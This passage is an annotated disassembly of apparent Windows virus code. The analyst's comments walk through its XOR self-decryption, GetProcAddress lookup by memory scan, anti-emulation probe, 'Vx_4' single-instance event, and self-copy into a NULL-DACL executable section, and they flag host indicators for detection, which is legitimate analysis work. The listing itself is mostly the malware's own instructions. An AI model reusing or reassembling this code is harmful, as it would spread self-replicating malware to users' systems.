; line of the listing). This is a single-byte XOR decoder:
;   key   CL  = 0D5h (constant; it is never updated inside the loop)
;   count EBX = value loaded before this span (2A97h)
;   ptr   EDX = start address computed before this span, saved on the stack
; Each byte at [EDX] is XORed with the key, then control transfers to the
; decoded region with `jmp edx`. The stc/clc/cld/`mov edx, edx`/
; `jmp short $+2` instructions in between do no work; they match the filler
; alphabet written by sub_3143A75D.
; Detection note: a fixed one-byte key means the decoded body is recoverable
; statically, but the surrounding filler varies, so byte-exact signatures on
; this stub are unlikely to generalise -- match on the working instructions.
        and ecx, 0
        add ecx, 0D5h
        push edx                        ; keep the start address for the final jmp
        stc
        mov edx, edx
loc_3143BA63: ; CODE XREF: sub_3143B9DB+9Bj
        mov al, [edx]
        clc
        xor ax, cx                      ; only AL is stored back, so the effective key is CL
        mov [edx], al
        cld
        jmp short $+2
        add edx, 1
        dec ebx
        cld
        stc
        or ebx, ebx
        jnz short loc_3143BA63
        pop edx
        jmp short $+2
        leave
        clc
        jmp edx                         ; enter the decoded region
sub_3143B9DB endp
; ---------------------------------------------------------------------------
        jmp short $+2
        jmp short $+2
; =============== S U B R O U T I N E =======================================
;
; sub_3143BA83 -- returns with EDX = its own return address (pop/push of the
; return slot); `cmc` only toggles CF. Used by sub_3143B9DB to obtain a
; position-independent base.
sub_3143BA83 proc near ; CODE XREF: sub_3143B9DB+62p
        pop edx
        cmc
        push edx
        retn
sub_3143BA83 endp
; ---------------------------------------------------------------------------
        stc
; loc_3143BA88 -- same shape as sub_3143B39D: loads the pointer at [esp+10h],
; zeroes EAX and pops the return address into offset 0B8h of that structure
; (0B8h matches CONTEXT.Eip on x86). No return instruction is decoded before
; the zero-filled data that follows -- NOTE(review): confirm where this
; fragment really ends.
loc_3143BA88: ; CODE XREF: UPX2:3143B9C7p
        mov edx, [esp+10h]
        xor eax, eax
        pop dword ptr [edx+0B8h]
; ---------------------------------------------------------------------------
        dd 0EFh dup(0)
        dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 126h dup(0)
        dd offset loc_31439000
        dd 1341h dup(0)
; ---------------------------------------------------------------------------
; loc_31441000 -- position-independent start-up code. Summary of the visible
; steps:
;   1. `call $+5` leaves the address 31441005h-equivalent on the stack; EAX
;      reads it and every later [eax+...] / [ebp+...] reference is relative
;      to it (EBP = EAX - 101005h).
;   2. EBX is loaded from [esp+4] (the value above the pushed address, i.e.
;      what was on top of the stack at entry). If bit 400000h of the option
;      word at [eax+29ABh] is set, ESI/EDI are saved and EBX is instead
;      fetched through a pointer taken from the bytes at [eax+29AFh..];
;      the purpose of that indirection is not established by this excerpt.
;   3. 0E3h bytes are copied from [ebp+1039BCh] to the address obtained by
;      subtracting 18E05h from the stack slot at [esp+4].
;   4. EBX is rounded down to a page boundary and stepped down 100h bytes at
;      a time until the dword at +4Eh equals "This" and the header at
;      base+[base+3Ch] starts with "PE" (the text at +4Eh is where the usual
;      DOS-stub message sits in many Windows DLLs).
;   5. The export name table of that module is searched for a name with
;      "tP" at offset 2 and "ocAd" at offset 5 (fits "GetProcAddress"); the
;      matching function address is left in ESI.
;   6. The routine at [ebp+101120h] is called with EAX = ebp+101137h and
;      DX = the word at [eax-19h]; that routine is on the next line of the
;      listing.
; Nothing in the scan in step 4 is bounded other than EBX reaching zero.
loc_31441000: ; DATA XREF: UPX2:314442F8o
        call $+5
        cld
        mov eax, [esp]                  ; EAX = address of the instruction after the call
        mov ecx, [eax+29ABh]            ; same location as [ebp+1039B0h] once EBP is set below
        mov [eax+32F3h], ebx
        and ecx, 400000h
        mov ebx, [esp+4]
        jz short loc_3144104D
        pop ecx
        mov [eax+32F7h], esi
        mov cl, [eax+29AFh]
        mov [eax+32FBh], edi
        cmp cl, 0E8h
        jz short loc_31441041
        mov ebx, [eax+29B1h]
        jmp short loc_3144104B
; ---------------------------------------------------------------------------
loc_31441041: ; CODE XREF: UPX2:31441037j
        mov ecx, [eax+29B0h]
        mov ebx, [ecx+ebx+2]
loc_3144104B: ; CODE XREF: UPX2:3144103Fj
        mov ebx, [ebx]
loc_3144104D: ; CODE XREF: UPX2:3144101Fj
        push ebp
        mov ebp, eax
        sub dword ptr [esp+4], 18E05h
        sub ebp, 101005h
        mov edi, [esp+4]
        lea esi, [ebp+1039BCh]
        mov ecx, 0E3h
        rep movsb
        sldt cx
        test ecx, ecx
        jnz short loc_3144107B
        or eax, 0FFFFFFFFh
        int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
 ; DS:SI -> counted CR-terminated command string
; NOTE(review): the auto-generated DOS annotation above does not apply to a
; 32-bit PE. On NT-family Windows int 2Eh is the legacy system-service gate;
; issued with EAX = -1 and only when `sldt` returned 0, this looks like an
; environment probe (emulator or OS-family check) -- intent not established
; by the visible code.
loc_3144107B: ; CODE XREF: UPX2:31441074j
        and ebx, 0FFFFF000h
loc_31441081: ; CODE XREF: UPX2:31441090j
        cmp dword ptr [ebx+4Eh], 73696854h ; bytes 54 68 69 73 = "This"
        jz short loc_31441092
loc_3144108A: ; CODE XREF: UPX2:3144109Fj
        sub ebx, 100h
        jnz short loc_31441081
loc_31441092: ; CODE XREF: UPX2:31441088j
        mov eax, ebx
        add eax, [ebx+3Ch]
        mov edx, [eax+78h]              ; first data-directory entry (export table RVA in PE32)
        cmp word ptr [eax], 4550h
        jnz short loc_3144108A
        add edx, ebx
        mov esi, [edx+20h]              ; name-pointer table RVA
        mov ecx, [edx+18h]              ; number of names
        add esi, ebx
        push ecx
loc_314410AC: ; CODE XREF: UPX2:loc_314410C0j
        lodsd
        add eax, ebx
        cmp word ptr [eax+2], 5074h     ; "tP" at offset 2
        jnz short loc_314410C0
        cmp dword ptr [eax+5], 6441636Fh ; "ocAd" at offset 5
        jz short loc_314410C5
loc_314410C0: ; CODE XREF: UPX2:314410B5j
        loop loc_314410AC
        pop ecx
        jmp short loc_314410F0          ; name not found: take the exit path
; ---------------------------------------------------------------------------
loc_314410C5: ; CODE XREF: UPX2:314410BEj
        sub [esp], ecx                  ; name count - remaining = index of the match
        mov esi, [edx+24h]              ; ordinal table RVA
        pop ecx
        add esi, ebx
        movzx eax, word ptr [esi+ecx*2]
        mov edi, [edx+1Ch]              ; function address table RVA
        add edi, ebx
        mov esi, [edi+eax*4]
        add esi, ebx                    ; ESI = address of the matched export
        lea eax, [ebp+101137h]
        lea ecx, [ebp+101120h]
        mov dx, [eax-19h]               ; 16-bit value stored 19h bytes before the target region
        call ecx
        jmp short loc_31441137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144117E
loc_314410F0: ; CODE XREF: UPX2:314410C3j
 ; sub_3144117E+10j ...
; Body of loc_314410F0 (label on the preceding line): common exit path.
; When bit 22 of the flag dword is set, it writes five saved bytes back through
; [esp+arg_0] and reloads ebx/edi/esi from the slots filled at loc_31441000.
        mov eax, [ebp+1039B0h]
        and eax, 400000h
        jz short loc_3144111C
        lea esi, [ebp+1039B4h]
        lodsd
        mov edi, [esp+arg_0]
        stosd
        mov ebx, [ebp+1042F8h]
        movsb
        mov edi, [ebp+104300h]
        mov esi, [ebp+1042FCh]
loc_3144111C: ; CODE XREF: sub_3144117E-83j
        pop ebp
        retn
; END OF FUNCTION CHUNK FOR sub_3144117E
; ---------------------------------------------------------------------------
; NOTE(review): `retf 5394h` is the byte sequence CA 94 53. The code at
; loc_314410C5 reads a 16-bit value from exactly this address (eax-19h with
; eax = loc_31441137) and calls the address of the final 53h byte (push ebx), so
; this is presumably a key word followed by `push ebx`, not a far return.
        retf 5394h ; CODE XREF: sub_3144344B+2DFp
; ---------------------------------------------------------------------------
; XOR loop over 2879h bytes at [eax] with a key byte in dl that changes each
; round (sub dl, bl, then the two byte swaps). Ends with pop ebx / retn.
        mov ecx, 2879h
        mov ebx, edx
loc_31441128: ; CODE XREF: UPX2:31441133j
        xor [eax], dl
        sub dl, bl
        add eax, 1
        xchg bl, bh
        xchg dl, dh
        loop loc_31441128
        pop ebx
        retn
; ---------------------------------------------------------------------------
; NOTE(review): from here on IDA has disassembled inline ASCII strings as code.
; Each `call near ptr X+n` skips over a NUL-terminated string, leaving its address
; on the stack as an argument. The bytes between this call and loc_31441146+2
; decode as "CloseHandle",0; the bytes at the call target are 53 FF D6
; (push ebx / call esi).
loc_31441137: ; CODE XREF: UPX2:314410EEj
        call near ptr loc_31441146+2
        inc ebx
        insb
        outsd
        jnb short near ptr loc_314411A3+3
        dec eax
        popa
        outsb
        db 64h
        insb
loc_31441146: ; CODE XREF: UPX2:loc_31441137p
        add gs:[ebx-1], dl
        setalc
        mov [ebp+103E52h], eax ; slot 103E52h = result of the lookup for the string above
; Same pattern; the skipped bytes decode as "CreateEventA",0.
        call near ptr loc_31441162+1
        inc ebx
        jb short loc_314411BE
        popa
        jz short near ptr loc_314411C0+1
        inc ebp
        jbe short near ptr loc_314411C0+4
        outsb
        jz short loc_314411A3
loc_31441162: ; CODE XREF: UPX2:31441151p
        add [ebx-1], dl
        setalc
        mov [ebp+103E56h], eax ; slot 103E56h = result of the lookup for the string above
; Same pattern; the skipped bytes decode as "GetLastError",0 and the call lands
; on the first instruction of sub_3144117E.
        call sub_3144117E
        inc edi
        db 65h
        jz short near ptr loc_314411C0+1
        popa
        jnb short near ptr loc_314411EA+2
        inc ebp
        jb short near ptr loc_314411EA+3
        outsd
        jb short $+2

; =============== S U B R O U T I N E =======================================
; sub_3144117E: main initialisation. Finishes the first three API lookups,
; creates the named event (sub_3144154F), resolves a table of 20h further names,
; then copies the 0CC6h-dword body into newly obtained memory and jumps into the
; copy. All exits go through loc_31441524 / loc_314410F0.
sub_3144117E proc near ; CODE XREF: UPX2:3144116Cp

arg_0 = dword ptr 4

; FUNCTION CHUNK AT 314410F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31441524 SIZE 0000000B BYTES

        push ebx
; NOTE(review): esi was set at loc_314410C5 to the export whose name matched
; "..tP.ocAd" (the pattern of GetProcAddress), and it is called here as
; (module, name). IDA's "lstrcatA" label therefore looks wrong - confirm.
        call esi ; lstrcatA
        mov [ebp+103E5Ah], eax
        call sub_3144154F ; create the named event
        test eax, eax
        jz loc_314410F0 ; creation failed: leave
        push eax ; handle stays on the stack; loc_31441524 passes it to the [ebp+103E52h] call
        call dword ptr [ebp+103E5Ah]
        test eax, eax
        jnz loc_31441524 ; non-zero result: close the handle and leave
; NOTE(review): with the slot decodings above this is the usual
; "CreateEvent + GetLastError" single-instance check, which makes the event name
; a host-level indicator - confirm.
loc_314411A3: ; CODE XREF: UPX2:31441160j
              ; UPX2:3144113Fj
        cmp byte ptr [ebp+10152Fh], 1
        jnz short loc_314411C0
        push dword ptr [ebp+1042F8h]
        dec byte ptr [ebp+10152Fh]
        pop dword ptr [ebp+101588h]
loc_314411BE: ; CODE XREF: UPX2:31441157j
        jmp short loc_314411C7
; ---------------------------------------------------------------------------
loc_314411C0: ; CODE XREF: sub_3144117E+2Cj
              ; UPX2:3144115Aj ...
        and dword ptr [ebp+101588h], 0
loc_314411C7: ; CODE XREF: sub_3144117E:loc_314411BEj
        and dword ptr [ebp+101578h], 0
        and dword ptr [ebp+10157Ch], 0
        and dword ptr [ebp+101580h], 0
        push edi
        mov byte ptr [ebp+1012D4h], 1
        mov [ebp+103E5Eh], esi ; keep the resolver pointer for sub_3144158C
loc_314411EA: ; CODE XREF: UPX2:31441176j
              ; UPX2:31441179j
        lea esi, [ebp+1015F4h] ; name list (the db bytes starting "lstrlen")
        xor ecx, ecx
        lea edi, [ebp+103E6Ah] ; output table of resolved addresses
        mov cl, 20h ; 20h names
        call sub_3144158C
        pop edi
; NOTE(review): only bit 31 of the result is tested, which is the classic
; GetVersion Win9x/NT split if that is what slot 103EAAh holds - TODO confirm
; against the name table.
        call dword ptr [ebp+103EAAh]
        shr eax, 1Fh
        jz loc_314412E3 ; bit 31 clear: take the path at loc_314412E3
; Bit 31 set: edi still points at the export address table from loc_314410C5;
; entry 5 of it (+14h) plus the image base becomes the pointer in slot 103E62h.
        mov eax, [edi+14h]
        push 40h
        add eax, ebx
        push 8001000h
        mov [ebp+103E62h], eax
        push 7318h
        push 0
        call dword ptr [ebp+103EE2h] ; allocation-style call (0, 7318h, 8001000h, 40h); API name not visible here
        test eax, eax
        jz loc_31441524
        xchg eax, edi
        lea esi, [ebp+101000h] ; source = start of this body (loc_31441000)
        mov ebp, edi
        mov ecx, 0CC6h ; 0CC6h dwords = 3318h bytes
        sub ebp, 101000h ; re-base ebp onto the copy
        lea edx, [ebp+101254h]
        rep movsd
        jmp edx ; continue inside the copy; at the listed base that offset is the next instruction
; ---------------------------------------------------------------------------
; Builds a zeroed 20h-byte record on the stack and calls the pointer in slot
; 103E62h with small numeric codes (10003h, 10000h, 10001h, 1000Ah).
; NOTE(review): the meaning of those codes cannot be derived from this listing.
        sub esp, 20h
        mov edi, esp
        push 8
        xor eax, eax
        pop ecx
        lea edx, [ebp+101B3Dh]
        rep stosd
        mov edi, esp
        mov [edi+10h], edx
        inc byte ptr [edi+1Ch]
        push edi
        push 10003h
        call dword ptr [ebp+103E62h]
        add esp, 20h
        test eax, eax
        jz loc_31441524
        xchg eax, edi
        push 0
        push 1
        push 80000400h
        push 10000h
        call dword ptr [ebp+103E62h]
        test eax, eax
        jz loc_31441524
        push 0
        push eax
        push 40000h
        push 0
        shr eax, 0Ch
        push edi
        push 1
        push eax
        push 10001h
        call dword ptr [ebp+103E62h]
        push 1000Ah
        call dword ptr [ebp+103E62h]
        call loc_314412D3
        jmp loc_31441524
; ---------------------------------------------------------------------------
; ecx is always 1 here, so the jecxz never branches: this repeats the
; [ebp+103ED6h] call with argument 0Ah indefinitely.
loc_314412D3: ; CODE XREF: sub_3144117E+14Bp
              ; sub_3144117E+162j
        push 1
        pop ecx
        jecxz short locret_314412E2
        push 0Ah
        call dword ptr [ebp+103ED6h]
        jmp short loc_314412D3
; ---------------------------------------------------------------------------
locret_314412E2: ; CODE XREF: sub_3144117E+158j
        retn
; ---------------------------------------------------------------------------
loc_314412E3: ; CODE XREF: sub_3144117E+8Bj
        cmp dword ptr [ebp+103E82h], 0
        jz loc_31441524
; NOTE(review): another inline string. The skipped bytes 4E 54 44 4C 4C 00 are
; "NTDLL",0, and the bytes from the call target on (FF 95 9E 3E 10 00) decode as
; call dword ptr [ebp+103E9Eh]; IDA lost instruction alignment here, which is
; also why it reports "sp-analysis failed".
        call near ptr loc_314412FA+1
        dec esi
        push esp
        inc esp
        dec esp
        dec esp
loc_314412FA: ; CODE XREF: sub_3144117E+172p
        add bh, bh
sub_3144117E endp ; sp-analysis failed
        xchg eax, ebp
        sahf
        db 3Eh
        adc [eax], al
        lea esi, [ebp+1017CEh] ; second name list
        xor ecx, ecx
        lea edi, [ebp+103EEAh] ; second output table
        mov cl, 0Eh ; 0Eh names
        xchg eax, ebx ; ebx = module returned by the call above
        call sub_3144158C
        cmp dword ptr [ebp+103F1Eh], 0
        jz loc_31441524
; For several resolved entries the dword at (function address + 1) is copied
; into fixed locations inside this body.
; NOTE(review): on x86 NT the ntdll service stubs begin with `mov eax, imm32`, so
; +1 is the service number; presumably these are harvested for the int 2Eh stubs
; elsewhere in the body - confirm.
        mov eax, [ebp+103EEEh]
        push dword ptr [eax+1]
        pop dword ptr [ebp+103907h]
        mov eax, [ebp+103F06h]
        push dword ptr [eax+1]
        pop dword ptr [ebp+103954h]
        mov eax, [ebp+103EF2h]
        push dword ptr [eax+1]
        pop dword ptr [ebp+10395Bh]
        mov ecx, [ebp+103EF6h]
        jecxz short loc_31441373 ; optional entries: skip if not resolved
        push dword ptr [ecx+1]
        pop dword ptr [ebp+103968h]
        mov ecx, [ebp+103EFEh]
        jecxz short loc_31441373
        push dword ptr [ecx+1]
        pop dword ptr [ebp+103975h]
; Builds, on the stack and in the buffer at ebp+103F74h, the arguments for two
; native calls. The 19h-byte string at ebp+1015DBh (the db bytes
; '\BaseNamedObjects\VtSect',0) is widened to 16-bit characters behind a
; {30h, 32h, pointer} counted-string header.
; NOTE(review): the argument shapes match NtCreateSection (access 0Eh, size
; 7318h, protection 40h, attributes 8000000h) followed by NtMapViewOfSection on
; the current process (handle -1). A named, executable section called
; \BaseNamedObjects\VtSect is a useful host indicator - confirm the slot names
; against the second name list.
loc_31441373: ; CODE XREF: UPX2:31441357j
              ; UPX2:31441368j
        call sub_31441530 ; leaves a 20h-byte attribute block on the stack, eax -> it
        lea edi, [ebp+103F74h]
        mov ecx, edi
        push 0
        neg cl
        push dword ptr [eax+4]
        and ecx, 3
        push 40h
        add edi, ecx ; round edi up to a 4-byte boundary
        push edi
        push 0
        push 18h
        lea esi, [ebp+1015DBh]
        mov ecx, 19h
        lea eax, ds:0FFFFFFFEh[ecx*2] ; 2*19h-2 = 30h
        stosw
        lea eax, ds:0[ecx*2] ; 2*19h = 32h
        stosw
        lea eax, [edi+4] ; address just past the pointer field
        stosd
        xor ah, ah
        lea edx, [ebp+103E20h]
loc_314413BC: ; CODE XREF: UPX2:314413C5j
        lodsb
        mov [edx], ax ; second widened copy at ebp+103E20h
        stosw
        add edx, 2
        loop loc_314413BC
        mov edx, esp
        push 0
        push 7318h
        mov ecx, esp
        push 0
        mov eax, esp
        push 0
        push 8000000h
        push 40h
        push ecx
        push edx
        push 0Eh
        push eax
        call dword ptr [ebp+103EFAh]
        pop eax ; eax = value written through the first pointer argument
        add esp, 40h
        push 7318h
        mov edx, esp
        push 0
        mov ecx, esp
        push 40h
        push 0
        push 2
        push edx
        push 0
        push 7318h
        push 0
        push ecx
        push 0FFFFFFFFh
        push eax
        call dword ptr [ebp+103F02h]
        pop edi ; edi = address written through the third argument
        pop ecx
        test edi, edi
        jz loc_31441524
        lea esi, [ebp+101000h] ; copy the 0CC6h-dword body into the new region...
        mov ecx, 0CC6h
        mov ebp, edi
        rep movsd
        sub ebp, 101000h ; ...re-base ebp onto it...
        lea eax, [ebp+10143Ah]
        jmp eax ; ...and continue inside the copy
; ---------------------------------------------------------------------------
; NOTE(review): the dwords below are more code that IDA left as data. Among them,
; 44655300h..0E8570065h hold the ASCII bytes "SeDebugPrivilege",0, and
; `24247C81h, 73727363h` decodes as cmp dword ptr [esp+24h], 'csrs'. That would
; fit a privilege adjustment followed by a process-name check - not verified here.
        dw 5450h
        dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh
        dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
        dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh, 5295FF57h, 6A00103Eh
        dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h
        dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h
        dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
        dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh, 33000005h
        dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h
        dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh
        dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h
        dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h
        dd 103E52h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144117E
; Common failure/cleanup exit: one call through slot 103E52h, then the exit path.
loc_31441524: ; CODE XREF: sub_3144117E+1Fj
              ; sub_3144117E+B2j ...
        call dword ptr [ebp+103E52h]
        jmp loc_314410F0
; END OF FUNCTION CHUNK FOR sub_3144117E
; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_31441530: pops its return address, pushes eight dwords that stay on the
; CALLER's stack, and jumps back. On return eax -> {0Ch, ptr, 0} and ptr ->
; {40001h, 0, 0, 0, 0}. The caller must release 20h bytes itself.
; NOTE(review): that layout matches a SECURITY_ATTRIBUTES pointing at a
; SECURITY_DESCRIPTOR with revision 1, control 0004h and all four pointers NULL,
; i.e. an object created with it would carry a NULL DACL - confirm.
sub_31441530 proc near ; CODE XREF: UPX2:loc_31441373p
                       ; sub_3144154F+2p
        pop edx
        push 0
        push 0
        push 0
        push 0
        push 40001h
        mov eax, esp
        push 0
        push eax
        push 0Ch
        mov eax, esp
        jmp edx
sub_31441530 endp
; ---------------------------------------------------------------------------
aVx_4_1 db 'Vx_4',0 ; object name passed by sub_3144154F
        db 0

; =============== S U B R O U T I N E =======================================
; sub_3144154F: calls slot 103E56h with (attribute block from sub_31441530, 0, 0,
; name at ebp+101549h) and returns its result in eax.
; NOTE(review): with the usual ebp delta, ebp+101549h is aVx_4_1 ('Vx_4') and slot
; 103E56h was filled by the "CreateEventA" lookup, so this presumably creates a
; named event "Vx_4" - confirm.
sub_3144154F proc near ; CODE XREF: sub_3144117E+9p
        xor ecx, ecx
        call sub_31441530
        lea edx, [ebp+101549h]
        push edx
        push ecx
        push ecx
        push eax
        call dword ptr [ebp+103E56h]
        add esp, 20h ; drop the 20h bytes left on the stack by sub_31441530
        retn
sub_3144154F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
        align 4
        dd 585858h, 3318h, 0E63h, 3 dup(0)
        dd 29B0h, 0

; =============== S U B R O U T I N E =======================================
sub_3144158C proc near ; CODE XREF: sub_3144117E+7Cp
                       ; UPX2:31441312p ...
; Body of sub_3144158C (its `proc` line is on the preceding line): bulk name
; resolver.
; In:  ebx = module handle, esi -> list of NUL-terminated names,
;      edi -> output table, ecx = number of names.
; Each round calls the pointer in slot 103E5Eh with (ebx, esi), stores the result
; at [edi], then advances esi past the terminating NUL. sub_3144117E stores esi
; (its resolver pointer) into that slot before the first call.
        push ecx
        push esi
        push ebx
        call dword ptr [ebp+103E5Eh]
        stosd
        pop ecx
loc_31441597: ; CODE XREF: sub_3144158C+Ej
        lodsb
        test al, al
        jnz short loc_31441597 ; skip to the byte after the NUL
        loop sub_3144158C
        retn
sub_3144158C endp


; =============== S U B R O U T I N E =======================================
; sub_3144159F: calls slot 103EB6h with the string at ebp+101975h, stores the
; result at ebp+104278h, then resolves one more name from it into ebp+10427Ch.
; NOTE(review): the instructions between the `call near ptr` and loc_314415CC+1
; are an inline string misread as code; the bytes decode as
; "LookupPrivilegeValueA",0. The bytes at the call target (50 FF 95 5E 3E 10 00)
; decode as push eax / call dword ptr [ebp+103E5Eh].
sub_3144159F proc near ; CODE XREF: sub_3144311D+25p

; FUNCTION CHUNK AT 31441629 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 314419F9 SIZE 00000027 BYTES

        lea edx, [ebp+101975h]
        push edx
        call dword ptr [ebp+103EB6h]
        mov [ebp+104278h], eax
        call near ptr loc_314415CC+1
        dec esp
        outsd
        outsd
        imul esi, [ebp+70h], 50h
        jb short loc_31441629
        jbe short near ptr loc_31441629+2
        insb
        db 65h, 67h, 65h
        push esi
        popa
        insb
        jnz short loc_31441630
        inc ecx
loc_314415CC: ; CODE XREF: sub_3144159F+13p
        add [eax-1], dl
sub_3144159F endp ; sp-analysis failed
        xchg eax, ebp
        pop esi
        db 3Eh
        adc [eax], al
        mov [ebp+10427Ch], eax
        retn
; ---------------------------------------------------------------------------
; String data. The first 19h bytes are '\BaseNamedObjects\VtSect',0 (read by the
; code at loc_31441373 as ebp+1015DBh). The API-name list used by sub_3144117E
; (ebp+1015F4h) starts right after it with "lstrlen".
        db 5Ch ; \
        db 42h ; B
        db 61h ; a
        db 73h ; s
        db 65h ; e
        db 4Eh ; N
        db 61h ; a
        db 6Dh ; m
        db 65h ; e
        db 64h ; d
        db 4Fh ; O
        db 62h ; b
        db 6Ah ; j
        db 65h ; e
        db 63h ; c
        db 74h ; t
        db 73h ; s
        db 5Ch ; \
        db 56h ; V
        db 74h ; t
        db 53h ; S
        db 65h ; e
        db 63h ; c
        db 74h ; t
        db 0
        db 6Ch ; l
        db 73h ; s
        db 74h ; t
        db 72h ; r
        db 6Ch ; l
        db 65h ; e
        db 6Eh ; n
        db 0
        db 43h ; C
        db 72h ; r
        db 65h ; e
        db 61h ; a
        db 74h ; t
        db 65h ; e
        db 46h ; F
        db 69h ; i
        db 6Ch ; l
        db 65h ; e
        db 41h ; A
        db 0
        db 43h ; C
        db 72h ; r
        db 65h ; e
        db 61h ; a
        db 74h ; t
        db 65h ; e
        db 46h ; F
        db 69h ; i
        db 6Ch ; l
        db 65h ; e
        db 4Dh ; M
        db 61h ; a
        db 70h ; p
        db 70h ; p
        db 69h ; i
        db 6Eh ; n
        db 67h ; g
        db 41h ; A
        db 0
        db 43h ; C
        db 72h ; r
        db 65h ; e
        db 61h ; a
        db 74h ; t
        db 65h ; e
        db 50h ; P
        db 72h ; r
        db 6Fh ; o
        db 63h ; c
        db 65h ; e
        db 73h ; s
        db 73h ; s
        db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144159F
; NOTE(review): `add [ebx+72h], al` is the byte sequence 00 43 72, i.e. the NUL
; ending "CreateProcessA" followed by 'C','r'. What IDA lists from here as a
; function chunk is presumably the rest of the NUL-separated name table, not code.
loc_31441629: ; CODE XREF: sub_3144159F+1Fj
              ; sub_3144159F+21j
        add [ebx+72h], al
        db 
65h popa jz short near ptr loc_31441693+2 loc_31441630: ; CODE XREF: sub_3144159F+2Aj push edx db 65h insd outsd jz short loc_3144169B push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314416A6+2 push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314416B2+3 push esp outsd outsd insb push 33706C65h xor dl, [ebx+6Eh] popa jo short near ptr loc_314416D1+1 push 4500746Fh js short loc_314416CF jz short near ptr loc_314416BB+1 push 64616572h add [esi+69h], al insb db 65h push esp imul ebp, [ebp+65h], 79536F54h jnb short loc_314416F0 db 65h insd push esp imul ebp, [ebp+65h], 65724600h db 65h dec esp imul esp, [edx+72h], 797261h inc edi db 65h jz short near ptr loc_314416D3+6 loc_31441693: ; CODE XREF: sub_3144159F+8Fj imul ebp, [ebp+41h], 69727474h loc_3144169B: ; CODE XREF: sub_3144159F+95j bound esi, [ebp+74h] db 65h jnb short loc_314416E2 add [edi+65h], al jz short near ptr loc_314416EB+1 loc_314416A6: ; CODE XREF: sub_3144159F+A2j imul ebp, [ebp+53h], 657A69h inc edi db 65h jz short loc_314416F8 loc_314416B2: ; CODE XREF: sub_3144159F+AFj imul ebp, [ebp+54h], 656D69h inc edi loc_314416BB: ; CODE XREF: sub_3144159F+C7j db 65h jz short near ptr loc_3144170A+1 outsd db 64h jnz short near ptr loc_31441729+5 db 65h dec eax popa outsb db 64h insb db 65h inc ecx add [edi+65h], al jz short near ptr loc_3144171D+6 loc_314416CF: ; CODE XREF: sub_3144159F+C5j db 65h insd loc_314416D1: ; CODE XREF: sub_3144159F+BEj jo short near ptr loc_31441717+2 loc_314416D3: ; CODE XREF: sub_3144159F+F1j imul ebp, [ebp+4Eh], 41656D61h add [edi+65h], al jz short near ptr loc_31441731+3 db 65h insd loc_314416E2: ; CODE XREF: sub_3144159F+FFj jo short near ptr loc_31441731+3 popa jz short near ptr loc_3144174E+1 inc ecx add [edi+65h], al loc_314416EB: ; CODE XREF: sub_3144159F+105j jz short loc_31441743 db 65h jb short near ptr loc_31441762+1 loc_314416F0: ; CODE XREF: sub_3144159F+DBj imul ebp, [edi+6Eh], 74654700h push esi loc_314416F8: ; CODE 
XREF: sub_3144159F+110j db 65h jb short near ptr loc_3144176C+2 imul ebp, [edi+6Eh], 417845h inc edi db 65h jz short near ptr loc_3144175B+1 outsd insb jnz short near ptr loc_31441771+6 loc_3144170A: ; CODE XREF: sub_3144159F:loc_314416BBj db 65h dec ecx outsb outsw jb short near ptr loc_3144177C+2 popa jz short near ptr loc_3144177C+1 outsd outsb inc ecx loc_31441717: ; CODE XREF: sub_3144159F:loc_314416D1j add [edi+ebp*2+61h], cl db 64h dec esp loc_3144171D: ; CODE XREF: sub_3144159F+12Ej imul esp, [edx+72h], 41797261h add [ebp+61h], cl jo short loc_3144177F loc_31441729: ; CODE XREF: sub_3144159F+120j imul esp, [ebp+77h], 6946664Fh insb loc_31441731: ; CODE XREF: sub_3144159F+13Fj ; sub_3144159F:loc_314416E2j add gs:[edi+70h], cl outs dx, byte ptr gs:[esi] inc esi imul ebp, [ebp+4Dh], 69707061h outsb db 67h inc ecx loc_31441743: ; CODE XREF: sub_3144159F:loc_314416EBj add [edi+70h], cl outs dx, byte ptr gs:[esi] push eax jb short near ptr loc_314417B9+1 arpl [ebp+73h], sp loc_3144174E: ; CODE XREF: sub_3144159F+146j jnb short $+2 push eax jb short loc_314417C2 arpl [ebp+73h], sp jnb short near ptr loc_31441784+7 xor al, [esi+69h] loc_3144175B: ; CODE XREF: sub_3144159F+164j jb short near ptr loc_314417CA+6 jz short $+2 push eax jb short near ptr loc_314417CA+7 loc_31441762: ; CODE XREF: sub_3144159F+14Ej arpl [ebp+73h], sp jnb short near ptr loc_31441799+1 xor cl, [esi+65h] js short near ptr loc_314417DC+4 loc_3144176C: ; CODE XREF: sub_3144159F:loc_314416F8j add [ebx+65h], dl jz short near ptr loc_314417B5+2 loc_31441771: ; CODE XREF: sub_3144159F+169j imul ebp, [ebp+41h], 69727474h bound esi, [ebp+74h] loc_3144177C: ; CODE XREF: sub_3144159F+173j ; sub_3144159F+170j db 65h jnb short loc_314417C0 loc_3144177F: ; CODE XREF: sub_3144159F+188j add [ebx+65h], dl jz short loc_314417CA loc_31441784: ; CODE XREF: sub_3144159F+1B7j imul ebp, [ebp+54h], 656D69h push ebx insb db 65h, 65h jo short $+4 push ebx jns short loc_31441808 jz short loc_314417FC insd push esp 
